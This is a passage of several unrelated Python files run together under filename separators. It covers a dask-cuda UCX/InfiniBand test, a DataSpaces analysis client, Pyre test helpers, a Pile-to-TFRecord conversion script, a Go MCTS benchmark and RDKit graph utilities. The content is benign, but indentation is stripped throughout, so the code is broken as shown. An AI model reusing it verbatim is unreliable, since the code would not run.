"mlx5_1:1",
"mlx5_2:1",
"mlx5_2:1",
"mlx5_3:1",
"mlx5_3:1",
"mlx5_6:1",
"mlx5_6:1",
"mlx5_7:1",
"mlx5_7:1",
"mlx5_8:1",
"mlx5_8:1",
"mlx5_9:1",
"mlx5_9:1",
]
with DGX(
enable_tcp_over_ucx=True,
enable_infiniband=enable_infiniband,
enable_nvlink=enable_nvlink,
) as cluster:
with Client(cluster) as client:
res = da.from_array(cupy.arange(10000), chunks=(1000,), asarray=False)
res = res.sum().compute()
assert res == 49995000
def check_ucx_options():
conf = ucp.get_config()
assert "TLS" in conf
assert "tcp" in conf["TLS"]
assert "sockcm" in conf["TLS"]
assert "cuda_copy" in conf["TLS"]
assert "sockcm" in conf["SOCKADDR_TLS_PRIORITY"]
if enable_nvlink:
assert "cuda_ipc" in conf["TLS"]
if enable_infiniband:
assert "rc" in conf["TLS"]
return True
if enable_infiniband:
assert all(
[
cluster.worker_spec[k]["options"]["env"]["UCX_NET_DEVICES"]
== net_devices[k]
for k in cluster.worker_spec.keys()
]
)
assert all(client.run(check_ucx_options).values())
@pytest.mark.parametrize(
"params",
[
{"enable_infiniband": False, "enable_nvlink": False},
{"enable_infiniband": True, "enable_nvlink": True},
],
)
def test_ucx_infiniband_nvlink(params):
p = mp.Process(
target=_test_ucx_infiniband_nvlink,
args=(params["enable_infiniband"], params["enable_nvlink"]),
)
p.start()
p.join()
assert not p.exitcode
|
ana.py
|
# Analysis client: reads simulation data from the staging service (DataSpaces),
# checks each timestep for the pattern of interest, and
# writes info to the meta server once the data becomes meaningless.
from mpi4py import MPI
import numpy as np
import dataspaces.dataspaceClient as dataspaces
import ctypes
import os
import time
import math
import timeit
import sys
from threading import Thread
import os
sys.path.append('../../../src/publishclient/pythonclient')
import pubsub as pubsubclient
sys.path.append('../../../src/metadatamanagement/pythonclient')
import metaclient
# input the coordinate of the points and return the index of grid in array
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
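# getIndex maps a point (px, py, pz) inside a cube of side r = 15, split into
# gridnum = 15 cells per axis (cell size deltar = r/gridnum), to a flattened array
# index = z*gridnum^2 + y*gridnum + x; points outside the box return -1.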
def getIndex(px, py, pz):
# TODO: should handle all boundary cases
# currently only the lower bound case is handled
r = 15
gridnum = 15
deltar = 1.0*r/gridnum
if (px < 0 or py < 0 or pz < 0 or px > gridnum*deltar or py > gridnum*deltar or pz > gridnum*deltar):
#print "out of the box "
#print [px,py,pz]
return -1
gnumx = math.floor((px-0)/deltar)
gnumy = math.floor((py-0)/deltar)
gnumz = math.floor((pz-0)/deltar)
index = int(gnumz*gridnum*gridnum + gnumy*gridnum+gnumx)
return index
def checkAndPublishEvent(gridDataArray_p1, gridDataArray_p2):
ifTargetEventHappen = True
massOriginInterest = [6, 0, 6]
targetValue = 7.5
massR = 4
# put the analysis into the simulation part
for i in range(massOriginInterest[0], massOriginInterest[0]+massR):
for j in range(massOriginInterest[1], massOriginInterest[1]+massR):
for k in range(massOriginInterest[2], massOriginInterest[2]+massR):
#print "index i j k (%d %d %d)" % (i,j,k)
#print nparray[i][j][k]
#print "index i j k (%d %d %d)" % (i,j,k)
#print nparray[i][j][k]
index = getIndex(i, j, k)
if (gridDataArray_p1[index] != targetValue):
ifTargetEventHappen = False
break
if (ifTargetEventHappen == True):
print (iteration)
# send publish event
detecttime = timeit.default_timer()
print (detecttime)
print ("publish to pub/sub broker")
#sendEventToPubSub(iteration)
ifFirstHappen = True
return
initp = 1.5
targetValue = 7.5
def checkDataPattern(gridDataArray_p1, gridDataArray_p2):
coord1 = []
coord2 = []
# get the index of red block in data 1
# print("caculate coord1")
break_flag=False
for x in range(15):
if(break_flag==True):
break
for y in range (15):
if(break_flag==True):
break
for z in range (15):
index = getIndex(x,y,z)
if (gridDataArray_p1[index]==targetValue):
coord1 = [x,y,z]
break_flag=True
#print(coord1)
break
# get the index of the red block in data 2
#print("caculate coord2")
break_flag=False
for x in range(15):
if(break_flag==True):
break
for y in range (15):
if(break_flag==True):
break
for z in range (15):
index = getIndex(x,y,z)
if (gridDataArray_p2[index]==targetValue):
coord2 = [x,y,z]
break_flag=True
#print(coord2)
break
distance = pow((coord2[0]-coord1[0]),2)+pow((coord2[1]-coord1[1]),2)+pow((coord2[2]-coord1[2]),2)
#print(distance)
if(distance>140 and distance<150):
return True
else:
return False
def checkDataPatternCenter(gridDataArray_p1):
massOriginInterest = [7, 7, 7]
targetValue = 7.5
index = getIndex(massOriginInterest[0], massOriginInterest[1], massOriginInterest[2])
if (gridDataArray_p1[index] == targetValue):
return True
else:
return False
# copy all conf.* file to current dir
serverdir = "/home1/zw241/dataspaces/tests/C"
confpath = serverdir+"/conf*"
copyCommand = "cp "+confpath+" ."
os.system(copyCommand)
# number of clients at clients end to join server
num_peers = 1
appid = 2
var_name = "ex1_sample_data"
lock_name = "my_test_lock"
if(len(sys.argv)!=2):
print("./analytics <iteration>")
exit(0)
iteration = int(sys.argv[1])
startanay = timeit.default_timer()
ds = dataspaces.dataspaceClient(appid,comm)
currIter = 0
lb = [15*15*15*rank]
ub = [15*15*15*(rank+1)-1]
def threadFunction():
# check the meta periodically
addrList =metaclient.getServerAddr()
addr = addrList[0]
# poll the meta server until the 'simend' key is set (not NULL)
while(1):
value=metaclient.getMeta(addr, "simend")
if(value=="NULL"):
time.sleep(0.1)
continue
else:
break
endsim = timeit.default_timer()
print("sim end, stop the ana")
os._exit(0)
thread = Thread(target = threadFunction)
thread.start()
#while (True):
version = 0
while (version<iteration):
#for version in range(iteration):
# ds.lock_on_read(lock_name)
# version = currIter
#print("get version")
#print(version)
#use read write lock here
#ds.lock_on_read(lock_name)
# use lock type = 1
getdata_p1,rcode = ds.get(var_name, version, lb, ub)
#ds.unlock_on_read(lock_name)
# check if data ok
if(rcode == -11):
print("data not avaliable for ts %d"%(version))
time.sleep(0.1)
continue
#lb = [3380]
#ub = [3380+3374]
#print("get version")
#print(version)
#getdata_p2 = ds.dspaces_get_data(var_name, version, lb, ub)
# time.sleep(1)
# publish events to pubsub store
#print("get data1")
#print (getdata_p1)
#print("get data2")
#print (getdata_p2)
#patternHappened = checkDataPattern(getdata_p1,getdata_p2)
patternHappened = checkDataPatternCenter(getdata_p1)
#extra data read time is not being counted
time.sleep(0.01)
#if(currIter>=iteration):
# break
version=version+1
if(patternHappened==True):
#the time used for data analysis
#fake calling the analytics here and find the data is meaningless after analysing
time.sleep(0.05)
print("---------patternHeppen at ts %d, simulation data is meaningless----------"%(version))
# write to the meta server (the data is meaningless)
#addrList =metaclient.getServerAddr()
#addr = addrList[0]
#metaclient.putMeta(addr, "meaningless", "meaningless info")
#break
addrList=metaclient.getServerAddr()
addr = addrList[0]
metaclient.Recordtime(addr, "SIM")
ds.finalize()
endanay = timeit.default_timer()
print("time span")
print(endanay-startanay)
addrList =metaclient.getServerAddr()
addr = addrList[0]
print("test get: ", metaclient.getMeta(addr, "testkey"))
|
setup.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import asyncio
import contextlib
import functools
import json
import os
import socketserver
import tempfile
import threading
from pathlib import Path
from typing import (
Any,
Awaitable,
Callable,
Generator,
Iterable,
Mapping,
Optional,
Type,
TypeVar,
)
from pyre_extensions import ParameterSpecification
from ..find_directories import CONFIGURATION_FILE, LOCAL_CONFIGURATION_FILE
TParams = ParameterSpecification("TParams")
T = TypeVar("T")
def ensure_files_exist(root: Path, relatives: Iterable[str]) -> None:
for relative in relatives:
full_path = root / relative
full_path.parent.mkdir(parents=True, exist_ok=True)
full_path.touch(exist_ok=True)
def ensure_directories_exists(root: Path, relatives: Iterable[str]) -> None:
for relative in relatives:
full_path = root / relative
full_path.mkdir(parents=True, exist_ok=True)
def write_configuration_file(
root: Path, content: Mapping[str, Any], relative: Optional[str] = None
) -> None:
if relative is None:
(root / CONFIGURATION_FILE).write_text(json.dumps(content))
else:
local_root = root / relative
local_root.mkdir(parents=True, exist_ok=True)
(local_root / LOCAL_CONFIGURATION_FILE).write_text(json.dumps(content))
@contextlib.contextmanager
def switch_working_directory(directory: Path) -> Generator[None, None, None]:
original_directory = Path(".").resolve()
try:
os.chdir(str(directory))
yield None
finally:
os.chdir(str(original_directory))
@contextlib.contextmanager
def switch_environment(environment: Mapping[str, str]) -> Generator[None, None, None]:
old_environment = dict(os.environ)
os.environ.clear()
os.environ.update(environment)
try:
yield
finally:
os.environ.clear()
os.environ.update(old_environment)
def async_test(func: Callable[TParams, Awaitable[T]]) -> Callable[TParams, T]:
"""
Simple Decorator to allow for asyncio test methods in a standard
`unittest.TestCase`.
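
Example (a sketch; `some_coroutine` is a placeholder):

    class MyTest(unittest.TestCase):
        @async_test
        async def test_answer(self) -> None:
            self.assertEqual(await some_coroutine(), 42)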
"""
@functools.wraps(func)
def wrapper(*args: TParams.args, **kwargs: TParams.kwargs) -> T:
return asyncio.get_event_loop().run_until_complete(func(*args, **kwargs))
return wrapper
class TestServer(socketserver.ThreadingMixIn, socketserver.UnixStreamServer):
pass
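# The two context managers below run a threaded Unix-domain-socket server for tests:
# spawn_unix_stream_server_with_socket binds the given handler to a caller-provided
# socket path, while spawn_unix_stream_server creates a temporary socket and yields its path.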
@contextlib.contextmanager
def spawn_unix_stream_server_with_socket(
handler: Type[socketserver.BaseRequestHandler], socket_path: Path
) -> Generator[None, None, None]:
# Spawn a test server on another thread
server = TestServer(str(socket_path), handler)
server_thread = threading.Thread(target=server.serve_forever)
try:
server_thread.start()
yield
finally:
# Shutdown the server and terminate the test
server.shutdown()
server.server_close()
@contextlib.contextmanager
def spawn_unix_stream_server(
handler: Type[socketserver.BaseRequestHandler],
) -> Generator[Path, None, None]:
with tempfile.TemporaryDirectory() as socket_root:
socket_path = Path(socket_root) / "test.socket"
with spawn_unix_stream_server_with_socket(handler, socket_path):
yield socket_path
|
text2tfrecord.py
|
"""tokenization to bpe or character embeddings of text datasets"""
import argparse
import io
import multiprocessing
import os
import shutil
import time
import jsonlines
import requests
import simdjson
import tensorflow as tf
import zstandard
from google.cloud import storage
from transformers import GPT2TokenizerFast
parser = argparse.ArgumentParser()
parser.add_argument("--name", type=str, default="text",
help="Name of output files will be name_i.tfrecords where i is the number of the file")
parser.add_argument("--procs", type=int, default=2, help="Number of processes in multiprocessing")
parser.add_argument("--output_dir", type=str, default="gs://homebrewnlp-eu/the-token-pile/",
help="Where to put tfrecords (in a bucket)")
parser.add_argument("--int64", type=bool, default=True, help="Whether to encode as bytes or int64")
parser.add_argument("--buffer_size", type=int, default=2 ** 29, help="This is a minimum size, not a maximum size. "
"tfrecords will have this minimum size as well.")
parser.add_argument("--separator", type=str, default=chr(4),
help="separator to place between files in chunk mode."
"Default is \x04 (chr(4)) in case of byte encodings, "
"but should be changed to <|endoftext|> for BPE")
def file_generator(args, pid, procs):
base_url = 'http://eaidata.bmk.sh/data/pile/train/%s.jsonl.zst'
splits = 30
parse_fn = simdjson.Parser().parse
tmp_name = f".tmp.download.{pid}"
def _json_parser(x):
return parse_fn(x.encode()).as_dict()
for i in range(pid, splits, procs):
with requests.get(base_url.replace("%s", str(i).zfill(2)), stream=True) as r, open(tmp_name, 'wb') as f:
shutil.copyfileobj(r.raw, f)
with open(tmp_name, 'rb') as f:
for item in jsonlines.Reader(io.BufferedReader(zstandard.ZstdDecompressor().stream_reader(f)),
loads=_json_parser):
if isinstance(item, dict):
item = item['text']
if isinstance(item, list):
item = args.separator.join(item)
yield item
os.remove(tmp_name)
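# create_tfrecords accumulates documents until buffer_size bytes are reached, joins and
# encodes them (GPT-2 BPE tokens for int64, UTF-8 bytes otherwise), writes a single-example
# TFRecord and uploads it to the target GCS bucket before deleting the local file.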
def create_tfrecords(args, pid, procs):
slash_idx = args.output_dir.find('/')
bucket_name, output_dir = args.output_dir[:slash_idx], args.output_dir[slash_idx + 1:]
bucket = storage.Client().get_bucket(bucket_name)
join = args.separator.join
prefix = f"{'int64' if args.int64 else 'bytes'}_{args.name}_"
encode = (GPT2TokenizerFast.from_pretrained('gpt2') if args.int64 else str).encode
files_processed = 0
tfrecord_count = 0
chunk = 0
buffer_size = 0
tokenized_files = []
last_write = start_time = time.time()
for f in file_generator(args, pid, procs):
buffer_size += len(f)
tokenized_files.append(f)
files_processed += 1
if buffer_size > chunk * args.buffer_size // 4:
print(f"Worker: {pid:{len(str(procs))}d} | Buffer: {buffer_size * 2 ** -20:.1f}MB | "
f"Files: {files_processed} - TFrecords: {tfrecord_count} | "
f"Wrote: {time.time() - last_write:.0f}s ago - Started: {time.time() - start_time:.0f}s ago",
end='')
chunk += 1
if buffer_size > args.buffer_size:
filename = f"{prefix}{tfrecord_count:_>6d}_{files_processed}_{buffer_size}.tfrecord"
joined = encode(join(tokenized_files))
tokenized_files.clear()
with tf.io.TFRecordWriter(filename) as writer:
if args.int64:
feature = {"text": tf.train.Feature(int64_list=tf.train.Int64List(value=joined))}
else:
feature = {"text": tf.train.Feature(bytes_list=tf.train.BytesList(value=[joined]))}
tf_example = tf.train.Example(features=tf.train.Features(feature=feature))
writer.write(tf_example.SerializeToString())
bucket.blob(f'{output_dir}{filename}').upload_from_filename(filename)
os.remove(filename)
chunk = 0
buffer_size = 0
tfrecord_count += 1
print("")
last_write = time.time()
def main():
args = parser.parse_args()
if not args.output_dir.endswith("/"):
args.output_dir = args.output_dir + "/"
if not args.output_dir.startswith("gs://"):
print("Output dir isn't a cloud bucket. Exiting.")
return
args.output_dir = args.output_dir[len('gs://'):]
processes = [multiprocessing.Process(target=create_tfrecords, args=(args, pid, args.procs)) for pid in
range(args.procs)]
for p in processes:
p.start()
for p in processes:
p.join()
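def _example_read_tfrecord(path):
    # Illustrative sketch, not part of the original pipeline: shows how a record
    # written by create_tfrecords with an int64 "text" feature could be read back.
    # `path` is a placeholder for a tfrecord file produced above; only the int64
    # encoding is covered here.
    features = {"text": tf.io.VarLenFeature(tf.int64)}
    for raw in tf.data.TFRecordDataset(path).take(1):
        parsed = tf.io.parse_single_example(raw, features)
        return tf.sparse.to_dense(parsed["text"])  # 1-D tensor of token ids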
if __name__ == "__main__":
main()
|
bm_go.py
|
"""
Go board game
"""
import math
from mpkmemalloc import *
import os
import gc
import threading
import psutil
import random
import pyperf
SIZE = 9
GAMES = 200
KOMI = 7.5
EMPTY, WHITE, BLACK = 0, 1, 2
SHOW = {EMPTY: '.', WHITE: 'o', BLACK: 'x'}
PASS = -1
MAXMOVES = SIZE * SIZE * 3
TIMESTAMP = 0
MOVES = 0
def to_pos(x, y):
return y * SIZE + x
def to_xy(pos):
y, x = divmod(pos, SIZE)
return x, y
class Square:
def __init__(self, board, pos):
self.board = board
self.pos = pos
self.timestamp = TIMESTAMP
self.removestamp = TIMESTAMP
self.zobrist_strings = [random.randrange(9223372036854775807)
for i in range(3)]
def set_neighbours(self):
x, y = self.pos % SIZE, self.pos // SIZE
self.neighbours = []
for dx, dy in [(-1, 0), (1, 0), (0, -1), (0, 1)]:
newx, newy = x + dx, y + dy
if 0 <= newx < SIZE and 0 <= newy < SIZE:
self.neighbours.append(self.board.squares[to_pos(newx, newy)])
def move(self, color):
global TIMESTAMP, MOVES
TIMESTAMP += 1
MOVES += 1
self.board.zobrist.update(self, color)
self.color = color
self.reference = self
self.ledges = 0
self.used = True
for neighbour in self.neighbours:
neighcolor = neighbour.color
if neighcolor == EMPTY:
self.ledges += 1
else:
neighbour_ref = neighbour.find(update=True)
if neighcolor == color:
if neighbour_ref.reference.pos != self.pos:
self.ledges += neighbour_ref.ledges
neighbour_ref.reference = self
self.ledges -= 1
else:
neighbour_ref.ledges -= 1
if neighbour_ref.ledges == 0:
neighbour.remove(neighbour_ref)
self.board.zobrist.add()
def remove(self, reference, update=True):
self.board.zobrist.update(self, EMPTY)
self.removestamp = TIMESTAMP
if update:
self.color = EMPTY
self.board.emptyset.add(self.pos)
# if color == BLACK:
# self.board.black_dead += 1
# else:
# self.board.white_dead += 1
for neighbour in self.neighbours:
if neighbour.color != EMPTY and neighbour.removestamp != TIMESTAMP:
neighbour_ref = neighbour.find(update)
if neighbour_ref.pos == reference.pos:
neighbour.remove(reference, update)
else:
if update:
neighbour_ref.ledges += 1
def find(self, update=False):
reference = self.reference
if reference.pos != self.pos:
reference = reference.find(update)
if update:
self.reference = reference
return reference
def __repr__(self):
return repr(to_xy(self.pos))
class EmptySet:
def __init__(self, board):
self.board = board
self.empties = list(range(SIZE * SIZE))
self.empty_pos = list(range(SIZE * SIZE))
def random_choice(self):
choices = len(self.empties)
while choices:
i = int(random.random() * choices)
pos = self.empties[i]
if self.board.useful(pos):
return pos
choices -= 1
self.set(i, self.empties[choices])
self.set(choices, pos)
return PASS
def add(self, pos):
self.empty_pos[pos] = len(self.empties)
self.empties.append(pos)
def remove(self, pos):
self.set(self.empty_pos[pos], self.empties[len(self.empties) - 1])
self.empties.pop()
def set(self, i, pos):
self.empties[i] = pos
self.empty_pos[pos] = i
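# Zobrist hashing: each square holds one random integer per colour state
# (EMPTY/WHITE/BLACK); the board hash is the XOR of the integers for every
# square's current state, so a move only XORs the old value out and the new
# one in. The hash set is used by dupe() to detect repeated board positions.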
class ZobristHash:
def __init__(self, board):
self.board = board
self.hash_set = set()
self.hash = 0
for square in self.board.squares:
self.hash ^= square.zobrist_strings[EMPTY]
self.hash_set.clear()
self.hash_set.add(self.hash)
def update(self, square, color):
self.hash ^= square.zobrist_strings[square.color]
self.hash ^= square.zobrist_strings[color]
def add(self):
self.hash_set.add(self.hash)
def dupe(self):
return self.hash in self.hash_set
class Board:
def __init__(self):
self.squares = [Square(self, pos) for pos in range(SIZE * SIZE)]
for square in self.squares:
square.set_neighbours()
self.reset()
def reset(self):
for square in self.squares:
square.color = EMPTY
square.used = False
self.emptyset = EmptySet(self)
self.zobrist = ZobristHash(self)
self.color = BLACK
self.finished = False
self.lastmove = -2
self.history = []
self.white_dead = 0
self.black_dead = 0
def move(self, pos):
square = self.squares[pos]
if pos != PASS:
square.move(self.color)
self.emptyset.remove(square.pos)
elif self.lastmove == PASS:
self.finished = True
if self.color == BLACK:
self.color = WHITE
else:
self.color = BLACK
self.lastmove = pos
self.history.append(pos)
def random_move(self):
return self.emptyset.random_choice()
def useful_fast(self, square):
if not square.used:
for neighbour in square.neighbours:
if neighbour.color == EMPTY:
return True
return False
def useful(self, pos):
global TIMESTAMP
TIMESTAMP += 1
square = self.squares[pos]
if self.useful_fast(square):
return True
old_hash = self.zobrist.hash
self.zobrist.update(square, self.color)
empties = opps = weak_opps = neighs = weak_neighs = 0
for neighbour in square.neighbours:
neighcolor = neighbour.color
if neighcolor == EMPTY:
empties += 1
continue
neighbour_ref = neighbour.find()
if neighbour_ref.timestamp != TIMESTAMP:
if neighcolor == self.color:
neighs += 1
else:
opps += 1
neighbour_ref.timestamp = TIMESTAMP
neighbour_ref.temp_ledges = neighbour_ref.ledges
neighbour_ref.temp_ledges -= 1
if neighbour_ref.temp_ledges == 0:
if neighcolor == self.color:
weak_neighs += 1
else:
weak_opps += 1
neighbour_ref.remove(neighbour_ref, update=False)
dupe = self.zobrist.dupe()
self.zobrist.hash = old_hash
strong_neighs = neighs - weak_neighs
strong_opps = opps - weak_opps
return not dupe and \
(empties or weak_opps or (strong_neighs and (strong_opps or weak_neighs)))
def useful_moves(self):
return [pos for pos in self.emptyset.empties if self.useful(pos)]
def replay(self, history):
for pos in history:
self.move(pos)
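    # Area-style scoring: own stones plus empty points entirely surrounded by own
    # colour, plus captured opponent stones; White additionally receives KOMI.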
def score(self, color):
if color == WHITE:
count = KOMI + self.black_dead
else:
count = self.white_dead
for square in self.squares:
squarecolor = square.color
if squarecolor == color:
count += 1
elif squarecolor == EMPTY:
surround = 0
for neighbour in square.neighbours:
if neighbour.color == color:
surround += 1
if surround == len(square.neighbours):
count += 1
return count
def check(self):
for square in self.squares:
if square.color == EMPTY:
continue
members1 = set([square])
changed = True
while changed:
changed = False
for member in members1.copy():
for neighbour in member.neighbours:
if neighbour.color == square.color and neighbour not in members1:
changed = True
members1.add(neighbour)
ledges1 = 0
for member in members1:
for neighbour in member.neighbours:
if neighbour.color == EMPTY:
ledges1 += 1
root = square.find()
# print 'members1', square, root, members1
# print 'ledges1', square, ledges1
members2 = set()
for square2 in self.squares:
if square2.color != EMPTY and square2.find() == root:
members2.add(square2)
ledges2 = root.ledges
# print 'members2', square, root, members1
# print 'ledges2', square, ledges2
assert members1 == members2
assert ledges1 == ledges2, ('ledges differ at %r: %d %d' % (
square, ledges1, ledges2))
set(self.emptyset.empties)
empties2 = set()
for square in self.squares:
if square.color == EMPTY:
empties2.add(square.pos)
def __repr__(self):
result = []
for y in range(SIZE):
start = to_pos(0, y)
result.append(''.join(
[SHOW[square.color] + ' ' for square in self.squares[start:start + SIZE]]))
return '\n'.join(result)
class UCTNode:
def __init__(self):
self.bestchild = None
self.pos = -1
self.wins = 0
self.losses = 0
self.pos_child = [None for x in range(SIZE * SIZE)]
self.parent = None
def play(self, board):
""" uct tree search """
color = board.color
node = self
path = [node]
while True:
pos = node.select(board)
if pos == PASS:
break
board.move(pos)
child = node.pos_child[pos]
if not child:
child = node.pos_child[pos] = UCTNode()
child.unexplored = board.useful_moves()
child.pos = pos
child.parent = node
path.append(child)
break
path.append(child)
node = child
self.random_playout(board)
self.update_path(board, color, path)
def select(self, board):
""" select move; unexplored children first, then according to uct value """
if self.unexplored:
i = random.randrange(len(self.unexplored))
pos = self.unexplored[i]
self.unexplored[i] = self.unexplored[len(self.unexplored) - 1]
self.unexplored.pop()
return pos
elif self.bestchild:
return self.bestchild.pos
else:
return PASS
def random_playout(self, board):
""" random play until both players pass """
for x in range(MAXMOVES): # XXX while not self.finished?
if board.finished:
break
board.move(board.random_move())
def update_path(self, board, color, path):
""" update win/loss count along path """
wins = board.score(BLACK) >= board.score(WHITE)
for node in path:
if color == BLACK:
color = WHITE
else:
color = BLACK
if wins == (color == BLACK):
node.wins += 1
else:
node.losses += 1
if node.parent:
node.parent.bestchild = node.parent.best_child()
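    # UCB1-style node value: exploitation (win rate) plus an exploration bonus
    # sqrt(ln(parent visits) / (5 * node visits)); the factor 5 damps exploration.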
def score(self):
winrate = self.wins / float(self.wins + self.losses)
parentvisits = self.parent.wins + self.parent.losses
if not parentvisits:
return winrate
nodevisits = self.wins + self.losses
return winrate + math.sqrt((math.log(parentvisits)) / (5 * nodevisits))
def best_child(self):
maxscore = -1
maxchild = None
for child in self.pos_child:
if child and child.score() > maxscore:
maxchild = child
maxscore = child.score()
return maxchild
def best_visited(self):
maxvisits = -1
maxchild = None
for child in self.pos_child:
# if child:
# print to_xy(child.pos), child.wins, child.losses, child.score()
if child and (child.wins + child.losses) > maxvisits:
maxvisits, maxchild = (child.wins + child.losses), child
return maxchild
# def user_move(board):
# while True:
# text = six.moves.input('?').strip()
# if text == 'p':
# return PASS
# if text == 'q':
# raise EOFError
# try:
# x, y = [int(i) for i in text.split()]
# except ValueError:
# continue
# if not (0 <= x < SIZE and 0 <= y < SIZE):
# continue
# pos = to_pos(x, y)
# if board.useful(pos):
# return pos
def computer_move(board):
pos = board.random_move()
if pos == PASS:
return PASS
tree = UCTNode()
tree.unexplored = board.useful_moves()
nboard = Board()
for game in range(GAMES):
node = tree
nboard.reset()
nboard.replay(board.history)
node.play(nboard)
return tree.best_visited().pos
def versus_cpu():
random.seed(1)
board = Board()
return computer_move(board)
# if __name__ == "__main__":
def functionWorker(tname, allocate_pkey):
if allocate_pkey:
pkey_thread_mapper(tname)
kw = {}
if pyperf.python_has_jit():
# PyPy needs to compute more warmup values to warmup its JIT
kw['warmups'] = 50
runner = pyperf.Runner(**kw, loops=1)
runner.metadata['description'] = "Test the performance of the Go benchmark"
runner.bench_func('go', versus_cpu)
del runner
pymem_reset()
def dummyFunc(name):
pass
def main(params):
pymem_setup_allocators(0)
gc.disable()
workers = len(params) if (len(params)>0) else 1
runner = pyperf.Runner(loops = 1)
runner.argparser.add_argument("--cases")
runner.bench_func("Dummy init", dummyFunc, "main")
del runner
threads = []
for i in range(workers):
tname = 'Worker' + str(i)
threads.append(threading.Thread(target=functionWorker, args=[tname,1], name=tname))
for idx, thread in enumerate(threads):
thread.start()
thread.join()
pymem_reset_pkru()
result = {}
for activation in params:
result[activation] = "Finished thread execution"
process = psutil.Process(os.getpid())
    print(process.memory_info().rss / 1024)  # resident set size in KiB
return(result)
# if __name__ == '__main__':
# out = main({'activation1':{},'activation3':{},'activation4':{}, 'activation2': {},
# 'activation31':{},'activation33':{},'activation34':{}, 'activation32': {},
# 'activation45':{},'activation46':{},'activation47':{}, 'activation48': {}})
# process = psutil.Process(os.getpid())
# print((process.memory_info().rss)/1024) # in bytes
|
utils.py
|
#!/usr/bin/env python
import numpy as np
import tensorflow as tf
import queue
import threading
import pickle
from rdkit.Chem import AllChem
from rdkit.Chem import Draw
from rdkit import Chem
from rdkit.Chem import rdmolops
from rdkit.Chem import rdFMCS
from collections import defaultdict, deque
import os
import heapq
import planarity
from rdkit.Chem import Crippen
from rdkit.Chem import QED
SMALL_NUMBER = 1e-7
LARGE_NUMBER= 1e10
geometry_numbers=[3, 4, 5, 6] # triangle, square, pentagon, hexagon
# bond mapping
bond_dict = {'SINGLE': 0, 'DOUBLE': 1, 'TRIPLE': 2, "AROMATIC": 3}
number_to_bond= {0: Chem.rdchem.BondType.SINGLE, 1:Chem.rdchem.BondType.DOUBLE,
2: Chem.rdchem.BondType.TRIPLE, 3:Chem.rdchem.BondType.AROMATIC}
def dataset_info(dataset): #qm9, zinc, cep
if dataset=='qm9':
return { 'atom_types': ["H", "C", "N", "O", "F"],
'maximum_valence': {0: 1, 1: 4, 2: 3, 3: 2, 4: 1},
'number_to_atom': {0: "H", 1: "C", 2: "N", 3: "O", 4: "F"},
'bucket_sizes': np.array(list(range(4, 28, 2)) + [29])
}
elif dataset=='zinc':
return { 'atom_types': ['Br1(0)', 'C4(0)', 'Cl1(0)', 'F1(0)', 'H1(0)', 'I1(0)',
'N2(-1)', 'N3(0)', 'N4(1)', 'O1(-1)', 'O2(0)', 'S2(0)','S4(0)', 'S6(0)'],
'maximum_valence': {0: 1, 1: 4, 2: 1, 3: 1, 4: 1, 5:1, 6:2, 7:3, 8:4, 9:1, 10:2, 11:2, 12:4, 13:6, 14:3},
'number_to_atom': {0: 'Br', 1: 'C', 2: 'Cl', 3: 'F', 4: 'H', 5:'I', 6:'N', 7:'N', 8:'N', 9:'O', 10:'O', 11:'S', 12:'S', 13:'S'},
'bucket_sizes': np.array([28,31,33,35,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,53,55,58,84])
}
elif dataset=="cep":
return { 'atom_types': ["C", "S", "N", "O", "Se", "Si"],
'maximum_valence': {0: 4, 1: 2, 2: 3, 3: 2, 4: 2, 5: 4},
'number_to_atom': {0: "C", 1: "S", 2: "N", 3: "O", 4: "Se", 5: "Si"},
'bucket_sizes': np.array([25,28,29,30, 32, 33,34,35,36,37,38,39,43,46])
}
else:
print("the datasets in use are qm9|zinc|cep")
exit(1)
# add one edge to adj matrix
def add_edge_mat(amat, src, dest, e, considering_edge_type=True):
if considering_edge_type:
amat[e, dest, src] = 1
amat[e, src, dest] = 1
else:
amat[src, dest] = 1
amat[dest, src] = 1
def graph_to_adj_mat(graph, max_n_vertices, num_edge_types, tie_fwd_bkwd=True, considering_edge_type=True):
if considering_edge_type:
amat = np.zeros((num_edge_types, max_n_vertices, max_n_vertices))
for src, e, dest in graph:
add_edge_mat(amat, src, dest, e)
else:
amat = np.zeros((max_n_vertices, max_n_vertices))
for src, e, dest in graph:
add_edge_mat(amat, src, dest, e, considering_edge_type=False)
return amat
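# Illustrative example (not in the original code): graph entries are (src, edge_type, dest)
# triples, e.g. graph_to_adj_mat([(0, 0, 1), (1, 1, 2)], 3, len(bond_dict)) yields a
# [num_edge_types, 3, 3] tensor with a SINGLE bond between nodes 0-1 and a DOUBLE bond 1-2.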
def check_edge_prob(dataset):
with open('intermediate_results_%s' % dataset, 'rb') as f:
adjacency_matrix, edge_type_prob, edge_type_label, node_symbol_prob, node_symbol, edge_prob, edge_prob_label, qed_prediction, qed_labels,mean, logvariance=pickle.load(f)
for ep, epl in zip(edge_prob, edge_prob_label):
print("prediction")
print(ep)
print("label")
print(epl)
# check whether a graph is planar or not
def is_planar(location, adj_list, is_dense=False):
if is_dense:
new_adj_list=defaultdict(list)
for x in range(len(adj_list)):
for y in range(len(adj_list)):
if adj_list[x][y]==1:
new_adj_list[x].append((y,1))
adj_list=new_adj_list
edges=[]
seen=set()
for src, l in adj_list.items():
for dst, e in l:
if (dst, src) not in seen:
edges.append((src,dst))
seen.add((src,dst))
edges+=[location, (location[1], location[0])]
return planarity.is_planar(edges)
def check_edge_type_prob(dataset, filter=None):
with open('intermediate_results_%s' % dataset, 'rb') as f:
adjacency_matrix, edge_type_prob, edge_type_label, node_symbol_prob, node_symbol, edge_prob, edge_prob_label, qed_prediction, qed_labels,mean, logvariance=pickle.load(f)
for ep, epl in zip(edge_type_prob, edge_type_label):
print("prediction")
print(ep)
print("label")
print(epl)
def check_mean(dataset, filter=None):
with open('intermediate_results_%s' % dataset, 'rb') as f:
adjacency_matrix, edge_type_prob, edge_type_label, node_symbol_prob, node_symbol, edge_prob, edge_prob_label, qed_prediction, qed_labels,mean, logvariance=pickle.load(f)
print(mean.tolist()[:40])
def check_variance(dataset, filter=None):
with open('intermediate_results_%s' % dataset, 'rb') as f:
adjacency_matrix, edge_type_prob, edge_type_label, node_symbol_prob, node_symbol, edge_prob, edge_prob_label, qed_prediction, qed_labels,mean, logvariance=pickle.load(f)
print(np.exp(logvariance).tolist()[:40])
def check_node_prob(dataset, filter=None):
print(dataset)
with open('intermediate_results_%s' % dataset, 'rb') as f:
